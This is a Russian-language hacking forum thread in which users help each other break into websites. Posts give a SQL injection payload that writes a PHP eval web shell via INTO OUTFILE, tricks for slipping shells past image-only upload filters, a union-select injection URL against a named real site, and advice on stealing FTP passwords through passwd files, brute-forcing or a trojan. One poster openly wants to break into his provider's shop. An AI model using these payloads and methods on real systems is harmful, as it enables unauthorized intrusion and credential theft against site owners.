Юзаю скрипт nsTView v2.1 питаюсь зайти в папку где много фалов виснеть все! С другими папками проблем нет
Как можно попробовать залить ПХП шелл если проходят файлы только с расширение gif и jpg? И возможно ли через SQL-inj залить фаил?
Попробуй расширение shell.jpg.php или в кртинку вставить код Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна запись.. https://forum.antichat.ru/thread43966.html 2.2.1 Запись в файл Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую. Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; -- Для нее работает несколько ограничений. Запрещенно перезаписывание файлов Требуются привилегии типа FILE (!)Обязательны настоящие кывычки в указании имени файла А вот что бы нам мешало сделать веб шел? Вот например так: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; -- Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
<> () заменяюся на спец символы... Полный путь я знаю... А PHP шелл не заливался так-как туда вообще ничего не заливается
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
Имею страницу: site.ru/magazine/tapki.html Если подставить /tapki'.html - то вылазиет Code: Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26 Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо.
Не надо кричать!!! Тебе пример привести чтоли??? Я не говорю про пути!!! Где ты в пути видел знаки () и <> у??? Можно конечно, крутится как обычная скуля, вот пример тебе: Code: http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html Источник: http://www.karabas.info/
GПопобывал прямо твой пример - эфекта ноль,но я так понимаю это изза количества столбцов Где можно почитать хороший,доступный ман по этому делу..?
ДА нет,ошибка выоазиет,просто это магазин моего провайдера,так сказать электронный,и там кое что для меня интересное лежит.Хочеться пробраться.
Эту скулю нашёл я. Сообщил авторам сайта. Они прикрыли, и вывели сообщение, типо ты кулхакер, но это не ошибка мускуля, т.к. автор говорил, что переданные данные в этом скрипте фильтруются (только числа).
Я тебя вообще непониаю,какое отношение это иеет ко не? оО В обще почитав статейку, сработала коанда с коентарием, -- , сижу подбираю столбцы. Если интересно,то сайт воть: http://www.j-mag.ru/games/item/avtofeny_zaryazhennye_sk%27orostyu.html, но я незнаю как урутить с фореачем,а точнее никак походу,а т часть где идет ускл_еррор, невидно из внехи, это Личный кабинет,воть.
Приветствую.Ребят, извините если не в ту тему пишу... В общем такая ситуация-немогу настроить скрипт от Elekt'a на one simvol brut Одни звездочки вместо ascii символов, хотя руками через подзапросы я подобрал пару первых таблиц.Но все перебрать физически не смогу.Да и скрипт на перле, что для меня крайне неудобно. Посоветуйте какой нибудь php скрипт корректно работающий для подобных целей.Если такой имеется конечно, (уверен что должен быть).SIPT ни третий ни четвёртый не берёт так же... Далее Имеется сайт, 5-ая ветка, пробую сдампить скриптом-пустые поля =( Хотя скрипт другие сайты дампит корректно.И хексил уже, и с конкатом игрался, и с кодировкой (на неё грешил) и latin1 ставил и binary...Что только в общем не делал.Хотя если руками выводить, то просто concat_ws(0x3A3a,table_schema,table_name,column_name) выводит нормально на сайте.Но вот скрипт не берёт...SIPT так же не тянет, ни третий ни четвёртый.Версию выводит, юзера, database.А вот дампить-нивкакую. ПОМОГИТЕ! =) Хотелось бы тоже корректно работающий скриптик.Или если есть желание-в лс, поковыряемся вместе...
Привет всем есть доступ на сервак shell есть доступ phpAdmin! Нужно узнать пароль на фтп как это можно сделать? брутит не охота там 14 символов! phpAdmin(могу поменять пароль админа на свой) но не охота палится! Кто поможет?
Как вариант поройся в базе, частенько пассы от фтп хранят именно в БД... Или как вариант поищи passwd на сервере. Сделай юзер лист с списком всех юзеров в passwd. Потом бери фтп брутофорсер, который использует юзер листы. Запускай его указывая user.txt куда мы вписали всех юзверей... по другому имхо никак... ну или троя админу и все дела)))
